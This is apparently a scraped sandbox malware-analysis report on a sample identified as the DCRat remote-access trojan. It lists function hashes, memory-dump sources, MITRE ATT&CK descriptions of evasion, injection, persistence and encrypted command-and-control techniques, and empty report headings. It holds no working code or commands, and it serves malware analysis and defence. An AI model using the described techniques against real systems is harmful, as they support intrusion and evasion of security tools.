Instruction Fuzzy Hash: 64115E71A1995E4EEBA4EBB8C8586FD7BE0FF18301F414976D42DC20E6EE74A6448B40

Function 00007FFD9BABD71D Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baba000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 686bb3e74ef047b3df1e2a0ebdf3a8a22ad54eeb35cfc1fbe83012efe7f692ad
Instruction ID: 8b5942c016bc5cab92109c73caad95f3dc6388ca611f6a8b8db835eabfc66bd8
Opcode Fuzzy Hash: 686bb3e74ef047b3df1e2a0ebdf3a8a22ad54eeb35cfc1fbe83012efe7f692ad
Instruction Fuzzy Hash: A7117070A0A55E4FEB58EB64C8692FD7BA0FF18304F4108BAD469C61A2DA75A680CB00

Function 00007FFD9BAE7CC0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a28d4026e50a7e69e91ebadde18a274e40fecee97a5d697216f9dff6f40788a
Instruction ID: 3cd442f1c5ba72e92645136ef4d9454e2a028f7da9eb8dc9487a13756efa4429
Opcode Fuzzy Hash: 3a28d4026e50a7e69e91ebadde18a274e40fecee97a5d697216f9dff6f40788a
Instruction Fuzzy Hash: C0018C30A09A0E8FDB98EF68C4686BE77E1FF58305F10457ED41DC21A4CB71A650CB40

Function 00007FFD9BAC2795 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76a52d3286b1fd4bd169af3dd8191a2d08302382256c23c7f105be804de64338
Instruction ID: bd810238e5576d244fa1a32fd4ccccdc2780bfc5a3e9d054168b9bdf3977ae99
Opcode Fuzzy Hash: 76a52d3286b1fd4bd169af3dd8191a2d08302382256c23c7f105be804de64338
Instruction Fuzzy Hash: C201B530A0A68D4FEB58EBA4C4A92B97BA0FF19314F1204BED419C70E2DE75A650CB00

Function 00007FFD9BACD4BC Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 789e2cb804f8abaa2b59ae9c1b1b03e65b259df6f05b834ace7a8f88feaa202e
Instruction ID: c5b6b3a0bb892c0903991f16bc17b12b7912801ba357082cf91700d136d6d0c9
Opcode Fuzzy Hash: 789e2cb804f8abaa2b59ae9c1b1b03e65b259df6f05b834ace7a8f88feaa202e
Instruction Fuzzy Hash: 7D011272B1DA1C4FDB58FBA8E4656FCB7A1EF49320B11007AE14EC3293DD2969428740

Function 00007FFD9BAE01F8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb4c82a932f65bbdf4a7921906e88b1f82bd14baad3c32c817c186201c111604
Instruction ID: 509bf8ae3861a857258a93487f8e8eada2daf0b4f3916ec45fce88fe0dc0889b
Opcode Fuzzy Hash: fb4c82a932f65bbdf4a7921906e88b1f82bd14baad3c32c817c186201c111604
Instruction Fuzzy Hash: 45015E30A1550E8FEB98EFA4D4A86BE76E0FF28314F10087AD41ED21A4DE756650CB50

Function 00007FFD9BAE6DC0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241a9a34e122068a8dde2f9c286a9001103728fe7b2e72240a2efe5a3ae4d20a
Instruction ID: 6709ddfecdb6c4b22682350d84f83f5ff393eddd597db5dcb4748d79a65413ad
Opcode Fuzzy Hash: 241a9a34e122068a8dde2f9c286a9001103728fe7b2e72240a2efe5a3ae4d20a
Instruction Fuzzy Hash: A801F731A0AA0D4FDB98EF68C4B52B977D0FF04304F01487ED01EC21E5DE716150C601

Function 00007FFD9BABCA20 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baba000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a83cbffca0b6c8cbcf41e676af529486a313592ddde3fe9e25b7b0be255b035b
Instruction ID: e62bcb74ce999b54aec3b89e96ec002412ac03ab4ea3d828ea947ed47e12c1b1
Opcode Fuzzy Hash: a83cbffca0b6c8cbcf41e676af529486a313592ddde3fe9e25b7b0be255b035b
Instruction Fuzzy Hash: 6A11A530A0E69D4FD75ADBA484785B97FA1FF19304F0104BFD419C60A2EE785640CB01

Function 00007FFD9BABC4E0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baba000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59e926f135f420a741cb57f3dc42c134c1b426bde4f8e52df0fd02376539e629
Instruction ID: 93ca8f029ff7fd39d836387e461ab4716154f4e946d1fcb55d85aa1c5bb08f04
Opcode Fuzzy Hash: 59e926f135f420a741cb57f3dc42c134c1b426bde4f8e52df0fd02376539e629
Instruction Fuzzy Hash: 5B017130E5551E8EEB58EF64C469ABD77E0FF18304F10097AD42DC21A4EF74A250CB00

Function 00007FFD9BAC7709 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ced3d6e7a1f76d025219bfd26aff5c59d2722d180ab4075d34ac91f727876be
Instruction ID: b78feafe9fcb9a11f141e796797197c40f5d9f465a0c105c9e694429f3f26604
Opcode Fuzzy Hash: 7ced3d6e7a1f76d025219bfd26aff5c59d2722d180ab4075d34ac91f727876be
Instruction Fuzzy Hash: DB017171A0E68E4FE751BB7488695B97BE0EF1A300F1649F2D458C70B6EE64A944C701

Function 00007FFD9BABB05A Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baba000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd52623194dd86c7700af64fe11b00ea4418626bbddd1a893aa11d20599beec2
Instruction ID: 2451562d2f58838325b76bdcd1a97c0372a0d07e23f5a68e82363d683c814270
Opcode Fuzzy Hash: dd52623194dd86c7700af64fe11b00ea4418626bbddd1a893aa11d20599beec2
Instruction Fuzzy Hash: D6014430A1955E9EEB61EFA4C8985F97BE0FF05300F814475E43DC20A6EE74A6548A00

Function 00007FFD9BACDDC6 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513afe88868c3cdfd854a73370c900f0ec5f187dc99c7303d2860cee7f74a61e
Instruction ID: 8a947972fbf692867aa25d3d7902658ab5f9da06788574cc0cd3f6e1fd7a3d31
Opcode Fuzzy Hash: 513afe88868c3cdfd854a73370c900f0ec5f187dc99c7303d2860cee7f74a61e
Instruction Fuzzy Hash: 40F08621B1DD0E4BD7A4FB68D4505A673D1EF58350B404A7DD04EC71E7EE28B9468380

Function 00007FFD9BABC161 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baba000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69bf534aae7a5adfa41c077c768c542e2936d549a2e9c0bc833147b754b1fcf8
Instruction ID: f79eb3d78671cafa04cc77da083bb90be037603df130e7c3ec23feb7e36c08a4
Opcode Fuzzy Hash: 69bf534aae7a5adfa41c077c768c542e2936d549a2e9c0bc833147b754b1fcf8
Instruction Fuzzy Hash: E1F0A470A0E69E4FEBA5DF6498696FE7BA0FF15301F01047BE428C21A1EB7856548B00

Function 00007FFD9BACDC57 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87d51f987daa6ef962eff496e960d79ea66089ab7b93e8a0b347ed75e5a96867
Instruction ID: 44ffbf847b12e419704f5d9e24b414573f5995643a2cf7dd757b11229ed12a39
Opcode Fuzzy Hash: 87d51f987daa6ef962eff496e960d79ea66089ab7b93e8a0b347ed75e5a96867
Instruction Fuzzy Hash: 18F0F03270990E4AE365B78CE8617E523D2DBD4320F060639C45DC33E6DDADEAC28280

Function 00007FFD9BABC549 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baba000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f921d83ede0e171347e5cd50b6a66917eb7bcf6767b99cdc78d2e7501a3b857b
Instruction ID: 48089beab967f54d9a8813ab8cb293b830d0be7eedd362f3b429f869aad26b24
Opcode Fuzzy Hash: f921d83ede0e171347e5cd50b6a66917eb7bcf6767b99cdc78d2e7501a3b857b
Instruction Fuzzy Hash: 53F0C830A4A78E8FDB659F6488655F93BB0FF15304F4205BBE41DC60A2DB7C9654CB41

Function 00007FFD9BAD0834 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fa69acb064f834aa2fee4cfe6235147fd090657bc8f5ddb164aff99847e3ebc
Instruction ID: 65f4d16dfe0563f592f323b70029d5158989377ef7e52d5617d4683fc4f09120
Opcode Fuzzy Hash: 7fa69acb064f834aa2fee4cfe6235147fd090657bc8f5ddb164aff99847e3ebc
Instruction Fuzzy Hash: 9801EC71A0D65D8EDBA8DB5888A5BB876A1FB59700F0401E9D04DD3292CA742980CB05

Function 00007FFD9BAD0BC2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba2c76d87a10804915034b4dd583ea59705298faafb6b11077a7421122c27076
Instruction ID: 771c964ce1000f67cdbf0947e27c659cf917bf16b512ffc74fe39b8d27a6dc56
Opcode Fuzzy Hash: ba2c76d87a10804915034b4dd583ea59705298faafb6b11077a7421122c27076
Instruction Fuzzy Hash: 0DF0963154F3C99FD332DBB088715E57FA5AF43204B1501F6D445CB0B2D5AD161AC761

Function 00007FFD9BABB1F7 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baba000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0624d82d804b9849d8c02248a0df123634d233e70e565cef5ea891052a896549
Instruction ID: 2b6074e2b103ad7b5c327949c7bff9365ecbe954529715869c521d1e68806660
Opcode Fuzzy Hash: 0624d82d804b9849d8c02248a0df123634d233e70e565cef5ea891052a896549
Instruction Fuzzy Hash: A7F0EC70A0992D8EDBA4EB58C865BAD73B1FF58300F5186B6D01DE3166CE746A868F40

Function 00007FFD9BAC842C Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d50f3b39e22f0e9ef6438975e1e42e28d05688680b79c47a2356d9dc3a36c9a
Instruction ID: e7980b2e193c1e1deba6e2450d2e56218b6f8e44e030ca73953aee64dfc3e9ed
Opcode Fuzzy Hash: 6d50f3b39e22f0e9ef6438975e1e42e28d05688680b79c47a2356d9dc3a36c9a
Instruction Fuzzy Hash: 0EF0D070E0552D4EEBA0EB58C8657A9B7B1FB59301F5140F5805CD3262DE702EC18F01

Function 00007FFD9BAD230B Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64a4af7eb11c5e028a80a50506a2887fc3637ea288d158f557a090a64aac4ad7
Instruction ID: 5ec171b76cdbb641214eafdea5e037b48d82141c63178d2e9f5cc8da1658c66b
Opcode Fuzzy Hash: 64a4af7eb11c5e028a80a50506a2887fc3637ea288d158f557a090a64aac4ad7
Instruction Fuzzy Hash: F2F0A03471A70DCBE7759BA0D0706BAB7A0FF80315F600A3ED44F82891CB79BA40C680

Function 00007FFD9BAC6C0E Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bc7bb90de43bc8cbbe63af2789bcf2edbb463625bb8ee76b38536ba84104f4f
Instruction ID: 7f1fdc27bf30341331361ae61c3ce21b3eb458ba2e9fdd7bb36c0eee02151295
Opcode Fuzzy Hash: 7bc7bb90de43bc8cbbe63af2789bcf2edbb463625bb8ee76b38536ba84104f4f
Instruction Fuzzy Hash: A7E0823094990C8FCA20AB69A8053A972A4FB98308F4102BAD40CC3082E7796AA9CB45

Function 00007FFD9BAD35C0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2413032575734e6afe3462f468e570f176a3c40af3c9e23587c2bc125e3364cf
Instruction ID: 8189416c3c5d4eb36b88a45904619861da5350c2d6204322008d63708271b80e
Opcode Fuzzy Hash: 2413032575734e6afe3462f468e570f176a3c40af3c9e23587c2bc125e3364cf
Instruction Fuzzy Hash: 93F05F74D1962D8FDBACDF98C8A0AECB7B1BB88301F20016D941EA7341CA342A40CF44

Function 00007FFD9BAD253B Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2896557074.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bac1000_qVUjshNEHYUOCXyHyUMQwFlZoe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1f1b4aea1218e20984488581e3467b230e599542d4a0e6d66bc5c55888f24ae
Instruction ID: 3570588fe0eaff2ad103b4654544acf03d02c10a0b69e7b645af6e706e7bb130
Opcode Fuzzy Hash: a1f1b4aea1218e20984488581e3467b230e599542d4a0e6d66bc5c55888f24ae
Instruction Fuzzy Hash: 48C04C3450F3858ED72267A4C4611683BA45F0320475606B9D054861E7D5696559D7A1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report N0tepkRPzw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\WindowsPowerShell\Configuration\c4950d50751633

